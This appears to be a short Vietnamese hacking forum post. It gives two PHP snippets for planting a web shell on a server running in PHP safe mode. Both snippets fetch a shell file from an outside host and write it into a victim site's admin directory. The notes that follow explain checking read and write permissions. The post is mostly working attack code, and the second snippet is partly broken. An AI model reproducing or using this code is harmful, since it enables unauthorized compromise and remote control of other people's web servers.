Skip to main content

Up shell safe mode

Mẫu code dùng để up shell server có safe mode đang ON vì lúc đó ko thể dùng các hàm system,exec,shell_exec...
<?php
touch(ugvn.php);
chmod("ugvn.php", 0755);
$fin=fopen("http://www.vietnamsvisa.com/media/system/css/ugvn.txt",r)or exit("false 1");
$fout=fopen("/home/victim/domains/victim.com/public_html/admin/ugvn.php",a)or exit("false 2");
while(!feof($fin))
{
fwrite($fout,fgets($fin));
}fclose($fin);
fclose($fout);
?> 
or
<?php
touch(ugvn.php);
chmod("ugvn.php", 0755);
$fout=fopen("/home/victim/domains/victim.com/public_html/admin/ugvn.php",a)or exit("false");
fwrite($fout,file_get_contents(http://www.vietnamsvisa.com/media/sy...ss/ugvn.txt));
fclose($fout 
[+] http://www.vietnamsvisa.com/media/system/css/ugvn.txt <--- là link shell ở 1 host nào đó,up lên nhớ xem có quyền đọc ko đã nhé


[+] /home/victim/domains/victim.com/public_html/admin/ugvn.php <--- là vị trí shell đc đẩy vào host,hảy chắc chắn là ta có quyền ghi file ở đó nhé!

Share